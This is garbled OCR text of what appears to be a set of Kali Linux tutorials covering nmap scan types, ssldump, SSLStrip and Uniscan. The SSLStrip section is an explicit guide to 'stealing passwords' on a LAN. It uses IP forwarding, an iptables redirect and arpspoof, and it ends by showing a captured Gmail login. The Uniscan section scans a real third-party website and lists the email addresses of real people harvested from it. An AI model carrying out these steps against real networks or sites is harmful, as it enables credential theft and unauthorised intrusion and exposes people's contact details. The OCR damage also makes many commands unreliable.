A. Stealthy scan (Figure 14). 



Example - nmap -sS 192.168.237.129 



root@MrC 


ty:~# nmap -sS 192.168.237.129 




Sta rtinc 


Nmap 6.25 ( http://nmap.org ) at 2013 


-12-01 19:20 1ST 


Nmap scan report for 192.168.237.129 




Host is 


up [0.0011s latency) . 




Not shown: 996 closed ports 




PORT 


STATE SERVICE 




135/tcp 


open msrpc 




139/tcp 


open netbios-ssn 




445/tcp 


open microsoft-ds 




3389/tcp 


open ms -wbt -se rve r 




MAC Address: O0 : 0C : 29 : B0 : E3 : F3 (VMware) 




Nmap done: 1 IP address (1 host up) scanned in 


3.61 seconds 


root@MrC 


:~# | 





Figure 14. Stealthy TCP SYN scan 

B. Find out the most commonly used TCP ports using TCP connect scan (Figure 15). 

Example - nmap -sT 192.168.237.129 



;ty:~# nmap -sT 192.168.237.129 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-61 19:21 1ST 

Nmap scan report for 192.168.237.129 

Host is up [0.6035s latency). 

Not shown: 996 closed ports 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

3389/tcp open ms-wbt -server 

MAC Address: 06 : 6C :29 : B0 :E3 : F3 [VMware) 

Nmap done: 1 IP address [1 host up) scanned in 2.64 seconds 
:~# | 



Figure 15. TCP connect scan 



28 



Kali Linux 



C. Find out the most commonly used TCP ports using TCP ACK scan (Figure 16). 

Example - nmap -sA 192.168.237.129 
I File Edit View Search Terminal. Help 



ty:~# nmap -sA 192.168.237.129 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:22 1ST 
Nmap scan report for 192.168.237.129 
Host is up (0.0019s latency) . 

All 1000 scanned ports on 192.168.237.129 are unfiltered 
MAC Address: 00 :QC :29 :B0 : E3 :F3 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 3.65 seconds 

ty :~# 



Figure 16. TCP ACK scan 

D. Find out the most commonly used TCP ports using TCP Window scan (Figure 17). 

Example - nmap -sW 192.168.237.129 
I FiLe Edit View Search Terminal. HeLp 



root@MrQuiety :~# nmap -sW 192.168.237.129 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:23 1ST 
Nmap scan report for 192.168.237.129 
Host is up (0.0020s latency). 

All 1O0O scanned ports on 192.168.237.129 are closed 
MAC Address: 00 :0C :29 :B0 :E3 :F3 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 2.50 seconds 

root@MrQuiety : ~# 



Figure 1 7. TCP Window scan 

E. Find out the most commonly used TCP ports using TCP Maimon scan (Figure 18). 

Example - nmap - sM 192.168.237.129 



1 FiLe Edit View Search Terminal. HeLp 


■y:~# nmap -sM 192.168.237.129 




Starting Nmap 6.25 ( http://nmap.org ) at 2013-12- 


01 19:23 1ST 


Nmap scan report for 192.168.237.129 




Host is up (0.0026s latency) . 




All 1000 scanned ports on 192.168.237.129 are closed 


MAC Address: 60 :QC :29 :B0 :E3 :F3 [VMware) 




Nmap done: 1 IP address [1 host up) scanned in 3.58 seconds 


root@HrQuiety :~4t 





Figure 18. TCP Maimon scan 



Step 1 2. 

List scan - this command is used to list the targets to scan (Figure 19). 
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Example - nmap -sL 192.168.237.129 



1 FiLe Edit View Search Terminal Help 


-y:~# nmap -sL 192.168.237.129 






Starting Nmap 6.25 ( http://nmap.org ] at 2913-12 


-01 


19:24 1ST 


INmap scan report for 192.168.237.129 






iNmap done: 1 IP address (9 hosts up) scanned in 9 


33 


seconds 


root@MrQuiety :~# 







Figure 19. List scan 



Step 13. 

Host discovery or ping scan - scan a network and find out which servers and devices are up and running 
(Figure 20). 

Example - nmap -sP 192.168.237.0/24 
FiLe Edit View Search Terminal Help 



root@MrQuiety :~# nmap -sP 192.168.237.0/24 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:25 1ST 

Nmap scan report for 192.168.237.1 

Host is up (0.0647s latency) . 

MAC Address: 60 :50 :56 :C0 :00 :08 (VMware) 

Nmap scan report for 192.168.237.2 

Host is up (0.00029s latency). 

MAC Address: 60 :50 :56 :ED :D4 :DE (VMware) 

Nmap scan report for 192.168.237.128 

Host is up . 

Nmap scan report for 192.168.237.129 

Host is up (0.00053s latency). 

MAC Address: 60 :0C :29 :B0 :E3 :F3 (VMware) 

Nmap scan report for 192.168.237.254 

Host is up [0.00024s latency). 

MAC Address: 80 :50 :56 :F7 :8B :F4 (VMware) 

Nmap done: 256 IP addresses (5 hosts up) scanned in 8.78 seconds 
:-# | 



Figure 20. Ping scan 



Step 1 4. 

Scan a host when protected by the firewall (Figure 21). 

Example - nmap -PN 192.168.237.1 
FiLe Edit View Search TerminaL HeLp 



:~# nmap -PN 192.168.237.1 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:26 1ST 
Nmap scan report for 192.168.237.1 
Host is up (0.0011s latency). 

All 1090 scanned ports on 192.168.237.1 are filtered 
MAC Address: 00 :56 :56 :C0 : 00 :68 [VMware) 

Nmap done: 1 IP address (1 host up] scanned in 23.91 seconds 

root@MrQuiety :~# 



Figure 21. Scanning a host while protected by firewall 
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How to Use Ssldump in Kali Linux 

by Rrajesh Kumar 

Ssldump is an SSL/TLS network protocol analyzer. It identifies TCP connections on the 
chosen network interface and attempts to interpret them as SSL/TLS traffic. When it identifies 
SSL/TLS traffic, it decodes the records and displays them in a textual form to stdout. If 
provided with the appropriate keying material, it will also decrypt the connections and 
display the application data traffic (www.rtfm.com). 



Step 1 . How to open 



A. GUI Method (Figure 1). 

Applications — >Kali Linux — > Information Gathering — > SSL Analysis 




K£ Office 

-f Programming, 
^jjj] Sound & Video 
{Q^ SyiLern TooLi 



TiB Vul nprahility Analysis. 
i&t Wph- Appliratinn*; 
^* Password Attacks 
SJ' J Wireless Attacks 
flU Exploitation Tools 
Sniffing/Spoofing 
Maintaining Access 
Wj| Reverse Engineering 
*s[f Stress Testing 
iB, Hardware Hacking 

Torensics 
|?j Reportinq Tools 
System ServiLes 



*\ DNb Analysis 
* <\, lUb/IHb Icfentirication 
CL^ l iup Host Irip-ntihf atmn 
Mptwork Srannprs 
OS Fingprprinting 
<\ OSINT Analysis 
Cl^ Route Analysis 

Service Fingerprinting 
SMB Analysis 
<\ SMTP Analysis 
<\ SNMP Analysis 



Telephony Analysis 
Traffic Analysis 
VoIP Analysis 
VPN Aiialyiis 



Applications Places I*- J j£ '5 



Sun Dec 1, 7:3& PM 



ssldump 




P : 



Figure 1. Opening ssldump in the GUI 

B. Open the terminal and type ssidump -h. This command will open ssldump with help options (Figure 2). 



ro ot@ M r Q u i ety : 

FiLe Edit View Search Terminal. HeLp 



t@MrQuiety :~# ssldump -h 
Usage: ssldump [-r dumpfilej 
[ -k keyfile] 
[filter] 
:-# | 



[ -i interface 
-p password] 



Figure 2. Opening ssldump in the terminal 



-vtaTnsAxVNde] 
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Step 2. 



This command is used to show the traffic (Figure 3). 

Syntax - s sldump -i interface port no 
Example - s sldump -i ethO port 8 0 

file Edit View History Bookmarks Tools .Help 



O Google 



1+] 



roottglMrQuicty: ' 



^ [ fl http-s:/. .-vvvv. google. co. in.'?9.v:_- file Edit View Search Terminal Help 



ttVlHrftiiiety s<lrlunip -l fit! 
TCP connection *1: 192.168 



Tl po rt Rfl | our Interface | 

237.128(33668) bouncer©! .zlb.phx ,mozlTU.net( 



TCP connection #2: 192.168.237.128(57839) <-> bouncarOl .zlt> .phx .moziUa .not ( 



2. Opening uuww.j 



nnnlo rn in rttlorc 



I CP connection 93 
3.G1B0 (3.0108) 
4.599a (0.78R9) 
5.4137 [5.4137) 
5.90B6 (8.4869) | 
TCP connoctlon #5 
TCP connection M 
I CI 1 connection #7 
I CP connection #6 
TCP connection #fl 
fl. 9431 (G.9431) 
fl. 9450 (6.0819) 
TCP connactlon #9 
1 .B637 (1.0637) 
1.B643 [0.08051 
5.5916 (5.5316) 
5.5911 (5.5911) 
5.5931 (5.5931) 



192.168. 

C>0 Trp 
S>C TCP 
C»S TCP 

^cT -^ rcn 

192.168. 
192.168. 
192.168. 
192.166. 

132.168. 
S>C TCP 
CsS TCP 

192.168. 
S>C TCP 



.128(56066) < > 124.124.2O1.1//I80] 
OS indicates records transmitted from 
client to server 

. — |s>C indicates records transmitted from server to clicnt| 

.128(55796) <-> 0CSP.AHS1 .VERISIGN. COM(80) 
.128(55795) <-> QCSP.AMS1 . VERISIGN. COM(80) 
.1281&S798) < > UC8P . AM81 . VERISIGN. CUM ( 80] 
.128(35797) -=-> OCSP.AflSl .VERISIGN. C0TK SO) 
.178(55799) UC3P.AMS1 .VFRT5T(5N.CnH(Rfl) 



.128(55880) 0CSP.AMS1. VERISIGN. COM(80) 

1. First of all run this command on terminal 
then open www.google.com 



Figure 3. Showing the traffic 



Step 3. 

This command displays the application data traffic. This usually means decrypting it, but when -d is used, 
ssldump will also decode application data traffic before the SSL session initiates. This allows you to see 
HTTPS CONNECT behavior as well as SMTP STARTTLS. As a side effect, since ssldump can't tell 
whether plaintext is traffic before the initiation of an SSL connection or just a regular TCP connection, this 
allows you to use ssldump to sniff any TCP connection. 



Ssldump will automatically detect ASCII data and display it directly on the screen. Non-ASCII data is 
displayed as hex dumps (Figure 4 & 5). 



File Edit View H i story Bookma r ks Tools H cl p 
^Google 



ht t p 3 7/ w ww . google. coir 



root@MrQuie*y: ** 

FiLe Edit View Search Terminal HeLp 



root(dMrQui' ssldump -d -i athB port 80 

New TCP connection #1: 192.160.237.128(36369) < > ni-in-f94 . Iel00.net (06) 
fl.lfM3 (6.1663) C>S 

GET / HTTP/1.1 

Host: www.googls.co.in 

User-Agent: MoziUa/5.6 (XII; Linux 1606; rv:23.B) Gecko/20100101 rirefox/23.0 
Accgpt : text /html .appllc at ion/xhtml txrnl ,applIcatlon/xm"L ;q=G .9 , V* ;q=9 .8 
Accept Language: en UE,en;q=9.5 
Accejjl -Encoding : yziu, deflaLe 

Cookie : PRfch- ID-^dHbUal /b/a^bHal : U-bAbc ld2UcM848dc : HI— 8 : 1 H-l 3668993/1 : LH-1 38424 
94QB:S-2jLnd3T7tgTkDlzo; NID-G7^-CdF55S-sVnVULENle9TNtycAnxZFDelT-XrjSorp9g43du0 
QH454bk_WRI7hBDQuR9L5EdVSlM3dTn3XJnQ47wu3XvPTrHjtDHpmhcaWb61 -vzXJWBSnNSNLC_IEyK 
Connection: keep alive 



Figure 4. Application data traffic 
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Figure 5. Non-ASCII application data traffic (hex dumps) 



Step 4. 



Print absolute timestamps instead of relative timestamps (Figure 6). 





|E1 Guuyltf 

| A https://www.google.cojn 


root(§>MrQu[flty: w 

File Edit View Search Terminal Help 




:-# ssldump -e -i eth0 port 89 
New TCP connection #1: 192.168.237.128(36377) <-> ni-in-f94. lel00.netf.8Q) 
1 1385967629.2971 (116.1882) C>S TCP FIN 
1 1305967620.4605 (9.1713) Gs-C TCP TIN 
1 



Figure 6. Absolute timestamps 



Step 5. 

The full SSL packet header. Ssldump may print record-specific data on the rest of the line. For handshake 
records, it prints the handshake message. Thus, this record is a certificate message. Ssldump chooses certain 
record types for further decoding. These are the ones that have proven to be most useful for debugging: 

ciientHeiio - version, offered cipher suites, session ID (Figure 7). 

serverHeiio - version, session_id, chosen cipher suite, compression method (Figure 8). 
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FiLe Edit View History Bookmar 



^WeLcome to Facebook - Log In, 



A https://www.facEbook.com 



facebook 



Facebook helps you connfj 
people in your life. 





Figure 7. ClientHello 



root@MrQuiety: 

FiLe Edit View Search Terminal. HeLp 



)uiety:~# ssldump -H -i sthQ port 443 
New TCP connection #1: 192.168.237.128(35477) <-> edge-star-s 
.com(443) 

1 1 0.2762 (8.2762) C>S Handshake 
I ClientHello 
Version 3.1 
cipher suites 
Unknown value Qxff 
Unknown value GxcOOa 
Unknown value @xcQ14 
Unknown value 6x88 
Unknown value Qx87 
TLS_DHE_RSA_WITH_AES_256_CBC_SHA 
TLS_DHE_DSS_WITH_AES_256_CBC_SHA 
Unknown value OxcOOf 
Unknown value 6xc005 
Unknown value @x84 
TLS_RSA_WITH_AES_256_CBC_SHA 
Unknown value 0xc007 
Unknown value GxcGG9 



File Edit View History Bookman 



""■WeLcome to Facebook - Log In, .. 
[ fi https://wwvv.facebook.com 



facebook 



Facebook helps you conn* 
people in your life. 



root@)Mruuiety: 

FiLe Edit View Search TerminaL HeLp 



^dt 

A ill 



Figure 8. ServerHello 



TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA 
TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA 
Unknown value OxcQQd 
Unknown value 0xc003 
Unknown value Gxfeff 
TLS_RSA_WITH_3DES_EDE_CBC_SHA 
compression methods 
NULL 

1 2 0 8254 (0.5492) S>C Handshake 
Serve rHeLLo 

Version 3.1 
I session_id [0] = I 



cipherSuite Unknown value QxcQll 

I compressionnetnod I NULL 
1 3 oAjbbl (tt.UJyb) — S^T Handshake 

Certificate 
1 4 G.8651 (O.GGQ0) S>C Handshake 

Serve rKeyExchange 
1 5 G.8651 (0.O0G0) S>C Handshake 

Serve rHelloDone 
1 6 G.9094 (0.0443) C>S Handshake 

Client Key Exchange 
1 7 G.9094 (0.0000) C>S ChangeCiphe rSpec 
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How to Use SSLStrip in Kali Linux 

by Rrajesh Kumar 

In this tutorial, we will use sslstrip for stealing passwords from any PC which is connected 
to LAN. SSLStrip basically hijacks HTTP traffic. Nowadays, it 's a little difficult to steal the 
passwords from some websites. 

Step 1 . How to open 

A. GUI Method (Figure 1). 

Applications — >-Kali Linux — > Information Gathering — > SSL Analysis — > sslstrip 




fY Electronics 
Gr apfttes 

^ Internet 

AH Office 
^ Programming 

Sound & Virlen 
{Q} bystem I ools 



Vulnerability Analysis 
Q.ft Web Applications 
PasswnrH Attacks 
Wireless Attacks 
tit Exploitation Toots 
(J5 5niffing/'Spoofing 
^ Mdirildiiiinq AcctSS 

Reverse Engineering 
■Jjj Stress Testing 
, £5 , Hardware Hacking 
^ Forensics 

Reporting Tools 
^ff System Services 



DNS Analysis 
* IDS/IPS Identification 
Live Host Identification 
Network Scanners 
05 Fingerprinting 
CX^ 0S1NT Analysis 
Koute Analysis 
Service Fingerprinting 
^ 5MB Analysis I click Here I 

X 



<\ SMTP Andlybis 
<\ GNMP Analysis 



SSL Analysis 



Telephony Analysis 
Traffic Analysis 
VoIP Analysis 
> VPN Analysis 




sslyze 
^tunne»l!4 
^tlssled 



Applications Places ETJ 0 'J 



MonDee 2, 9;00 PM 



Figure 1. Opening SSLStrip in the GUI 

B. Open the terminal and type ssistrip -h. This command will open SSLStrip with help options (Figure 2). 

root@MrQuiety: " 

File Edit View Search Terminal. HeLp 



.ety:~# sslstrip -h 


2=> 




sslstrip 0.9 by Moxie Marlinspike 






Usage: sslstrip <options> 






Options : 






-w <filename>, - -write=<f ilename> 


Specify file to log to (optional) . 




-p , --post 


Log only SSL POSTs . (default) 




-s , --ssl 


Log all SSL traffic to and from server. 


-a , --all 


Log all SSL and HTTP traffic to and 


from serve 


r . 

-1 <port>, - -listen=<po rt> 


Port to listen on (default lGQQQ) . 




-f , --favicon 


Substitute a lock favicon on secure 


requests . 


-k , - -killsessions 


Kill sessions in progress. 




-h 


Print this help message. 




root@HrQuiety : ~# 







Figure 2. Opening SSLStrip in the terminal 
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Before starting SSLStrip, we need to do some other things for trapping our target: 

• IP forwarding 

• IP table for redirect 80 to 8080 

• Finding gateway IP 

• Finding target IP 

• Arpspoof 

Step 2. 

This command is used to enable IP forwarding (Figure 3). 

Syntax - echo '1' > /proc/sys/net/ipv4/ip_forward 



t@HrQuiety :~# echo '1' > /p roc/sys/net/ipv4/ip_f o rwa rd 
|uiety:~# | 



IP forwarding by this 
command 



Figure 3. IP forwarding 

Step 3. 

This command is used to redirect requests from port 80 to port 8080 to ensure our outgoing connections 
(from SSLStrip) get routed to the proper port (Figure 4). 

Syntax — iptables -t nat -A P REROUTING -p tcp -destination-port 80 -j REDIRECT -to-port 8080 



)uiety:-# iptables -t nat -A PRER0UTING -p tcp - -destination -port 8Q -j R 
EDIRECT --to-port 8080 
iiety:~# I 



Figure 4. Redirecting requests from port 80 to port 8080 



Step 4. 

This command is used to find the gateway IP (Figure 5). 

Syntax — netstat -nr 



rQuiety:~# netstat -nr 
Kernel IP routing table 
Destination Gateway 
0.0. 0.G 192.168.237.2 
192.168.237.0 0.0.0.0 

y 



Genmask 
! 0.G.0.0 

255.255.255.G 

Findout Gateway IP 



Flags 

UG 

U 



MSS Window 

0 0 
0 0 



irtt Iface 
G eth0 
0 eth0 



Figure 5. Finding gateway IP 
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Step 5. 

This is our target OS (Windows XP). By using ipconf ig, we got the target IP. I know you are thinking if 
I want to trap an unknown LAN PC, then how will we find out the IP address. Well, it's not that difficult, 
some social engineering can do your job. Come to the point on SSLStrip. Note the target IP (Figure 6). 



~ C:\WINDOWS\system32kmd.exe 






Microsoft Windows XP [Uersion 5.1.2600] 
Copyright 1985-2001 Microsoft Corp. 

C:\Docunents and Sett ingsSNbtscan Test >ipconf ig 


This is Target OS 
(Windows XP) 





Uindows IF Configuration 



Ethernet adapter Local Area Connection: 



nect ion-spe c if ic 
IP Address 



localdonain 
192.168.237.129 



Figure 6. Getting target IP 



Step 6. 



This command is used to redirect all network HTTP traffic through our computer using ARPSpoof (don't 
forget to enable IP forwarding before this). See Figure 7. 

Syntax - a rpspoof -i interface -t target IP -r gateway IP 
Example - arpspoof -i ethO -t 192.168.237.129 -r 192.168.237.2 



:-# arpspoof -i ethQ -t 192.168.237.129 -r 192.168.237.2 

0:c :29:fe:le:c0 0 :c :29 :b& :e3 : f& 0806 42: ard reply 192.168.23712 is -at G:c:29:fe 
:le:cG 

0:c :29:fe:le:c9 0 :50 :56 :sd :d4 :de 0806 42: erp reply 192.168.237.129 is-at 0:c:29 
: fe : Ig :c0 

0:c :29:fe:le:c0 G : c : 29 : b0 : d3 : f 3 G8G6 42: a -p reply 192 . 168 . 23"' . 2 is-at G:c:29:fe 
:le:c0 

0:c :29:fe:le:c0 G :5G :56 : ^d :d4 :de 0806 42: arp reply 192.168.237.129 is-at 0:c:29 
: fe : le :c0 

0:c :29:fe:le:c0 G:c :29:bG:e3:f3 G806 42: arp reply 192.168.237.2 is-at G:c:29:fe 
:le:cG 

0:c :29:fe:le:c0 G :5G :56 :ed :d4 :de 08G6 42: arp reply 192.168.237.129 is-at 0:c:29 

:fe:le:c0 L 



Kali interface 



Target IP 



Gategay IP 



Figure 7. Redirecting all network HTTP traffic through our computer 



Step 7. 

Now, we need to open a new terminal because this terminal is running ARPSpoof and we can't stop it right 
now (Figure 8). 
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File Edit View Search Terminal. HeLri^J Click here 



Open Tab 

New ProfiLe,,. 

CLose Tab 
CLose Window 



Shift+CtrL+T 



Shifts CtrL+W 
Shift+CtrL+O 



Figure 8. Opening new terminal 

Step 8. 

In the new terminal, use the following command. This command is used for listening on ports. -1 tells the 
system to listen on specified port (Figure 9). 

Syntax - ssistrip -i soso 



root@HrQuiety :~# ssistrip -1 8Q8S 

ssistrip 0.9 by Moxie Marlinspike running... 



Figure 9. Listening on port 8080 



Step 9. 

Now, go to the target OS, open www.gmail.com, enter your username and password, then click on Sign in. 
It's the same as we are using it for checking our Gmail (Figure 10). 



Address hccp: //accounts, google ,com/5erviceLogin?service=mail^assive=true^m=false&continue=http://mail, google, corn/rnail/&sc v | Si Go Links 

Sign in to continue to Gmail 



This is our target PC 
here we sign in gmail 



Enter ID and Password 
and Click on Sign in 



Email 



rrirquietv@grnaii.com 



L 



Password 



□ Stay signed in 



Need help? 



Figure 10. Logging on Gmail at the target PC 
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Step 1 0. 

After clicking Sign in on the target OS, go to the attacker PC (Kali Linux). You will see that SSLStrip has 
captured some data. After finishing the capture, press Ctrl + C for stopping SSLStrip. Data is automatically 
saved in a file named ssi strip . log (Figures 11 & 12). 




FiLe Edit View Search Terminal. HeLp 



root@HrQuiety :~# sslstrip -1 8080 

sslstrip 0.9 by Moxie Marlinspike running... 
Unhandled Error 

Traceback [most recont call last] : 

File "/usr/lib/python2 .7/dist -packages/twisted/python/log .py" , lins 84, in cal 
IWithLogge r 

return callWithContsxt ({ "system" : lp}, tunc, *args, **kw) 
File "/usr/lib/python2 .7/dist -packages/twisted/python/log .py" , line 69, in cal 
IWithContext 

return context . call ({ ILogContext : newCtx}, f unc , *args, **kw) 
File "/usr/lib/python2 .7/dist -packages/twisted/python/context .py" , line 118, i 
n callWithContext 

return self . cu rrentContext () .callWithContext (ctx, tunc, *args, **kw) 
File "/us r/lib/python2 .7/dist -packages/twisted/python/context .py" , line 81, in 
callWithContext 

return func ( ;t: args,**kw) 
— <except ion caught here> — 

File "/us r/lib/python2 .7/dist -packages/twisted/inte rnet/posixbase .py" , line 58 
6, in _doReadOrWrite 

why = selectable .doRead( ) 
File "/us r/lib/python2 .7/dist -packages/twisted/internet/tcp .py" , line 199, in 
doRead 

rval = self .protocol .dataReceived(data) 



Figure 11. Data captured by SSLStrip (part 1) 



return self . rawDataReceived(data) 
File "/us r/lib/python2 .7/dist -packages/twisted/web/http .py" , line 503, in rawD 
ataReceived 

self .handleResponseEndC ) 
File "/us r/sha re/sslst rip/sslst rip/Se rve rConnection .py " , line 117, in handleRe 
sponseEnd 

sel f . shutdown ( ) 

File "/us r/sha re/sslst rip/sslst rip/Se rve rConnection .py" , line 154, in shutdown 

sel f . client . finish ( ) 
File "/us r/lib/python2 . 7/dist -packages/twisted/web/http . py " , line 866, in fini 

sh 

"Request . finish called on a request after its connection was lost; " 
exceptions . RuntimeE rro r : Request . finish called on a request after its connection 
was lost; use Request . notifyFinish to keep track of this. 



Figure 12. Data captured by SSLStrip (part 2) 

Step 1 1 . 

Use the is command so you can see the saved file aS sslstrip . log (Figure 13). 
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File Edit View Search Terminal. 


Help 




root@MrQuiety :~# Is 






192.168.75.131 




kali . pdf 


9 .docx 




mrquiety 


commandss . txt 




name .csv 


commands .txt 




nmap output 


commands .txt .dnmapt race 




nmap results 


Desktop 




quiety 


dnsmap google com 2013 12 01 


O11650.txt 


receive .txt 


dnsmap google com 2G13 12 01 


Q12228. csv 


rec .txt 


filename .csv 




sketchbook 


filename .txt 




sslst rip .log 


f imap .log 




struct filename. mir 


info filename. mir 




WebScarab .properties 


JBC8-DSH8-TIXF.zip 




yersinia .log 


root@MrQuiety : ~# 







Figure 13. Is command 



Step 1 2. 

Use cat to open your sslstrip.log file and watch carefully. There are your victim's e-mail ID and password 
as shown in Figure 14. 

Syntax — cat sslstrip.log 



root@MrQuiety :~# |cat sslstrip.log | 

2Q13 : 12-02 21:21:49,625 SECURE POST Data (accounts.google.com]: 
GALX=CAIsV40CxuIScontinue=http%3A%2F%2Fmail .google .com%2Fmail%2FSservice=mailSrm 
=false&ltmpl=dsfault&scc=l&_utf8=%E2%98%83Sbgresponse=%21A0InQYNjLXM0JUT7hVRVQMh 
F5wIAAASzUgAAAOsqAPA6Qd6SHGLHraG_A0XCgeZ8cDoIufQk4YOygOJ -AGnl_E806hnDkYxmBS9J vei7 
StFD-S7k8U7n3mxbJhKPi-LS4PnvTf9QdmiYllk9dQtJVCAD-n63VdWWTxc_QdoydR8wVCOu0kDIomXD 
Tg5vyRkySf84gtofXJdVzlWG2LNxuMmUzX]BLnpIvoLyq8ch9rePyqPzg5SD7kIf7asK[Ti]7mGrG64I-C 
SbyUAVuGP4Xn5HW9t6JQC5BlviDG6aUfyHmic5QHKs9ME3nb9IViTpKH4Rg-9kdEI7NCTzHBXg0e9mh5 
-Cs9PvCtklbEEYMDZiT86Email=mrquiGty@gmail .com&Passwd=123456789@5signIn=Sign+in&r 
mShawn=l 

rootgHrQuiety :~# I 



Figure 14. Victim e-mail and password captured 
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How to Use Uniscan-gui /Uniscan in Kali 
Linux 

by Rrajesh Kumar 

Uniscan is a simple Remote File Include, Local File Include, and Remote Command 
Execution vulnerability scanner. 

Step 1 . How to open 

A. GUI Method (Figure 1). 

Applications— ► Kali Linux — > Web Applications — > Web Vulnerability Scanners — > uniscan-gui 




Oltice 

Programming 
System Tool 



Applications Places a $ x "> 



Sun Dec 1, 8:43 PM 



Figure 1. Opening Uniscan in the GUI 

B. Open the terminal, type uniscan-gui, and hit Enter (Figure 2). 

root@MrQuiety: ~ 
FiLe Edit View Search Terminal. Help 



t@rlrQuiety : ~# uniscan-gui 



I 



Uniscan Web Vulnerability Scanner 



URL: jlocalhost 

| Uniscan Options: Check Directory _| Check Files J Check . 'robots.txt J Dynamic tests 
_) Static tests J Stress tests Web Fingerprint Server Fingerprint 
Start scan Openlogflle 



Figure 2. Opening Uniscan-gui in the terminal 
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C. Open the terminal, type uniscan, and hit Enter (Figure 3). 
File Edit View Search Terminal. HeLp 



ety:~# uniscan 
#################################### 

# Uniscan project # 

# http://uniscan.sourceforge.net/ # 
#################################### 

V. 6.2 



OPTIONS: 



<url> example: https://www.example.com/ 
<file> list of url's 
Uniscan go to background 
Enable Directory checks 
Enable File checks 

Enable robots.txt and sitemap. xml check 

Enable Dynamic checks 

Enable Static checks 

Enable Stress checks 

<dork> Bing search 

<dork> Google search 

Web fingerprint 

Server fingerprint 



Figure 3. Opening Uniscan in the terminal 



Step 2. 



This command is used to scan the vulnerabilities on the target (Figure 4). 

Syntax — uniscan -u target host/IP -qweds 
Example — uniscan -u www.hubbardbrook.org -qweds 

Here, -q - enable directory checks 
FiLe Edit View Search Terminal. HeLp 



root@MrQuiety :~# uniscan -u www.hubbardbrook.org -qweds 
#################################### 

# Uniscan project # 

# http://uniscan.sourceforge.net/ # 
#################################### 

V. 6.2 



Figure 4. Scanning vulnerabilities on target 



Step 2A. 



Here, you can see the domain, server, and IP of the target URL, as well as the directory check result (Figure 5). 
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Domain : http : //www . hubba rdb rook . o rg/ 
Server: Apache/2.2.16 (Debian) 
IP: 132.177.243.198 



Directory check: 



[+] CODE 

[+] CODE 

[+] CODE 

[+] CODE 

[+] CODE 

[+] CODE 



2O0 URL 
20O URL 
200 URL 
2O0 URL 
2O0 URL 
20O URL 



http : //www. hubba rdb rook .org/eml/ 

ht t p : //www . hubba rdb rook . o rg/gis/ 

http : //www. hubba rdb rook .org/icons/ 

http : //www. hubba rdb rook . o rg/image_lib ra ry/ 

http : //www. hubba rdb rook .org/people/ 

http : //www. hubba rdb rook . o rg/samples/ 




Figure 5. Domain, server, IP, and directory check result 



Step 3. 



You can see file check, check robots.txt , check sitemap. xml, and Crawler plugin (Figure 6). 



File check: 

[+] CODE: 20O URL: http://ww.hubbardbrook.org/server-status 

[+] CODE: 2G0 URL: http://www.hubbardbrook.org/favican.ico 

[+] CODE: 20O URL: http://www.hubbardbrook.org/index.shtml 



Check robots.txt: 



Check sitemap . xml : 



Crawl 
Plugi 
Plugi 
Plugi 
Plugi 
Plugi 
Plugi 
Plugi 
Plugi 



er Started : 
n name : FCKedit 



n name: FCKeditor upload test v.l Loaded, 

n name: E-mail Detection v. 1.1 Loaded, 

n name: Code Disclosure v. 1.1 Loaded, 

n name: Upload Form Detect v. 1.1 Loaded, 

n name: Timthumb <= 1.32 vulnerability v.l Loade 

n name: External Host Detect v. 1.2 Loaded, 

n name: phpinfoU Disclosure v.l Loaded, 

n name: Web Backdoor Disclosure v. 1.1 Loaded, 

rawling finished, 1371 URL's found! 



Figure 6. File check, check robots.txt, check sitemap. xml, and Crawler plugin 

Step 4. 

You can see FCKeditor file upload and e-mails information (Figure 7). 
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FCKeditor File Upload: 
E-mails : 

[ + ] E-mail Found: dross@uvm.edu 

[+] E-mail Found: wjohnson@hbresearchfoundation.org 

[+] E-mail Found: ctdrisco@syr.edu 

[+] E-mail Found: tgs3@pantheon .yale .edu,ellen 

[+] E-mail Found: p.harty@worldnet.att.net 

[+] E-mail Found: pavel.com@gmail.com 

[+] E-mail Found: ggontarz@hotmail.com 

[+] E-mail Found: rperron@fs . fed .us 

[+] E-mail Found: pschaberg@fs . fed .us 

[+] E-mail Found: gwalsh@usgs.gov 

[+] E-mail Found: dali.fu@dartmouth.edu 

[+] E-mail Found: wim.clymans@geol.lu.se 

[+] E-mail Found: jlcampbell@fs . fed .us 

[+] E-mail Found: ameybailey@fs . fed .us 

[+] E-mail Found: rdyanai@mailbox.syr.edu 

[+] E-mail Found: .denny@aya.yale.edu 

[+] E-mail Found: ellen.denny@aya.yale.edu 

[+] E-mail Found: lovettg@caryinstitute.org 





Figure 7. FCKeditor file upload and e-mails information 

Step 5. 

Source Code Disclosure (Figure 8). 



| Source Code Disclosure: 

| [+] Source Code Found: http : //'www. hubbardb rook . a rg/mi rro rlake_kids_tou r/what_l 
ives_in_mi rro r_lake . htm 

| [+] Source Code Found: http://www.hubbardbrook.org/mirrorlake_kids_tour/how_di 
d_eve rything . htm 

| [+] Source Code Found: http://www.hubbardbrook.org/people/images/junkfiles.txt 

I [+] Source Code Found: http://www.hubbardbrook.org/mirrorlake_kids_tour/protis 
ta .htm 

| [+] Source Code Found: http://www.hubbardbrook.org/mirrorlake_kids_tour/anamal 
ia .htm 

| [+] Source Code Found: http://www.hubbardbrook.org/mirrorlake_kids_tour/what_i 
s_ecology .htm 

| [+] Source Code Found: http://www.hubbardbrook.org/mirrorlake_kids_tour/Templa 
tes/index3 . dwt . asp 

| [+] Source Code Found: http://www.hubbardbrook.org/people/images/2009 

I [+] Source Code Found: http://www.hubbardbrook.org/mirrorlake_kids_tour/anamal 

ia2.htm 



Figure 8. Source Code Disclosure 

Step 6. 

Timthumb and external hosts (Figure 9). 
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Timthumb : 



External hosts: 



+ ] 


External 


Host 


Found 


+ ] 


External 


Host 


Found 


+ ] 


External 


Host 


Found 


+ ] 


External 


Host 


Found 


+ ] 


External 


Host 


Found 
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External 


Host 


Found 
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External 


Host 


Found 
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External 
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External 


Host 
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External 


Host 


Found 


+ ] 


External 


Host 


Found 


+ ] 


External 


Host 


Found 


+ ] 


External 


Host 


Found 


